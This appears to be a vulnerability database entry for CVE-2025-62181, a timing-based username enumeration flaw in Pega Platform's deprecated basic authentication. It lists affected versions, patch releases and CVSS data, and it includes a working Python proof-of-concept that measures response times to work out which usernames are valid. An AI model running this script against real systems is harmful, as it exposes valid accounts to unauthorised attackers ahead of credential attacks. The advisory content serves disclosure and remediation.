Security Vulnerability Report
CVE-2025-62181 CVSS 5.3 MEDIUM

CVE-2025-62181

Published: 2025-12-10 21:16:04
Last Modified: 2026-04-15 00:35:42

Description

Pega Platform versions 7.1.0 through Infinity 25.1.0 are affected by a user enumeration vulnerability. The issue occurs during the user authentication process, where a difference in response time could allow a remote unauthenticated user to determine whether a username is valid. This only applies to the deprecated basic-authentication feature; other, more secure authentication mechanisms are recommended. A fix is being provided in the 24.1.4, 24.2.4, and 25.1.1 patch releases. Please note: the Basic credentials authentication service type has been deprecated starting in version 24.2: https://docs.pega.com/bundle/platform/page/platform/release-notes/security/whats-new-security-242.html.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness: CWE-204 (Observable Response Discrepancy)

Configurations (Affected Products)

Pega Platform 7.1.0
Pega Platform 7.2.x
Pega Platform 7.3.x
Pega Platform 7.4.x
Pega Platform 8.x
Pega Platform 21.x
Pega Platform 22.x
Pega Platform 23.x
Pega Platform 24.1.x (< 24.1.4)
Pega Platform 24.2.x (< 24.2.4)
Pega Platform 25.1.x (< 25.1.1)
Pega Platform 25.1.0 (Infinity)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62181 User Enumeration PoC
# Target: Pega Platform (versions 7.1.0 - 25.1.0)
# Vulnerability: User enumeration via timing attack on authentication
import requests
import time
import statistics

TARGET_URL = "https://target-pega-server.com/prweb/api/authentication"
USERNAME_FILE = "usernames.txt"
NUM_REQUESTS = 10  # Number of requests per username for timing analysis


def test_username_timing(username):
    """Test response time for a given username"""
    times = []
    for _ in range(NUM_REQUESTS):
        start = time.time()
        # Basic auth request (deprecated feature)
        response = requests.get(
            TARGET_URL,
            auth=(username, "fake_password_for_timing"),
            timeout=30
        )
        elapsed = time.time() - start
        times.append(elapsed)
    avg_time = statistics.mean(times)
    std_dev = statistics.stdev(times) if len(times) > 1 else 0
    return avg_time, std_dev


def main():
    print(f"[*] CVE-2025-62181 User Enumeration PoC")
    print(f"[*] Target: {TARGET_URL}")
    with open(USERNAME_FILE, 'r') as f:
        usernames = [line.strip() for line in f]

    # Establish baseline timing
    print("[*] Establishing baseline timing...")
    baseline_times = []
    for _ in range(NUM_REQUESTS):
        start = time.time()
        requests.get(TARGET_URL, auth=("nonexistent_user_12345", "x"), timeout=30)
        baseline_times.append(time.time() - start)
    baseline = statistics.mean(baseline_times)
    print(f"[*] Baseline response time: {baseline:.4f}s")

    print("[*] Starting user enumeration...")
    valid_users = []
    for username in usernames:
        avg_time, std_dev = test_username_timing(username)
        # If response time significantly differs from baseline, user might be valid
        time_diff = avg_time - baseline
        if abs(time_diff) > 0.1:  # Threshold for timing difference
            print(f"[+] Potential valid user: {username} (avg: {avg_time:.4f}s, diff: {time_diff:+.4f}s)")
            valid_users.append(username)
        else:
            print(f"[-] {username} (avg: {avg_time:.4f}s)")

    print(f"\n[*] Found {len(valid_users)} potential valid users:")
    for user in valid_users:
        print(f" - {user}")


if __name__ == "__main__":
    main()
```

References

- Pega Security Advisory J25 (vendor remediation note): https://support.pega.com/support-doc/pega-security-advisory-j25-vulnerability-remediation-note
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-62181", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:04.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pega Platform versions 7.1.0 through Infinity 25.1.0 are affected by a User Enumeration. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not. This only applies to deprecated basic-authentication feature and other more secure authentication mechanisms are recommended. A fix is being provided in the 24.1.4, 24.2.4, and 25.1.1 patch releases. Please note: Basic credentials authentication service type is deprecated started in 24.2 version: https://docs.pega.com/bundle/platform/page/platform/release-notes/security/whats-new-security-242.html."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://support.pega.com/support-doc/pega-security-advisory-j25-vulnerability-remediation-note", "source": "[email protected]"}]}}
```